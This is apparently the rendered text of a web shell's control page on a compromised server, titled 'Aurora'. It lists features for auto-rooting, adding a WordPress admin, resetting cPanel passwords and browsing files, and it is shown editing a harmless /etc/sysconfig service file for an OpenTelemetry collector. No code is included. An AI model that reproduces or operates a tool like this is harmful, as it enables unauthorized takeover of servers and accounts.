Aurora
Adminer
Auto Root
WP Admin
cPanel Reset
Anti Backdoor
Root
etc
sysconfig
Upload
New Folder
New File
Name
Size
Permissions
Actions
..
-
-
-
Upload File
Select File
New Folder
Folder Name
New File
File Name
Add WordPress Admin
Database Host
Database Name
Database User
Database Password
Admin Username
Admin Password
cPanel Password Reset
Email Address
Edit: observiq-otel-collector
# Configuration file for the observiq-otel-collector service. # These variables control the behavior of the observiq-otel-collector # Disabling the following for shellcheck, because they aren't relevant # to this file # shellcheck disable=SC2148,SC2034 # Environment variables BINARY=observiq-otel-collector PROGRAM=/opt/observiq-otel-collector/"$BINARY" START_CMD="nohup /opt/observiq-otel-collector/$BINARY > /dev/null 2>&1 &" LOCKFILE=/var/lock/"$BINARY" PIDFILE=/var/run/"$BINARY".pid # Set to true to enable service file debugging (Not currently available) DEBUG=false # These are exported export OIQ_OTEL_COLLECTOR_HOME=/opt/observiq-otel-collector export OIQ_OTEL_COLLECTOR_STORAGE=/opt/observiq-otel-collector/storage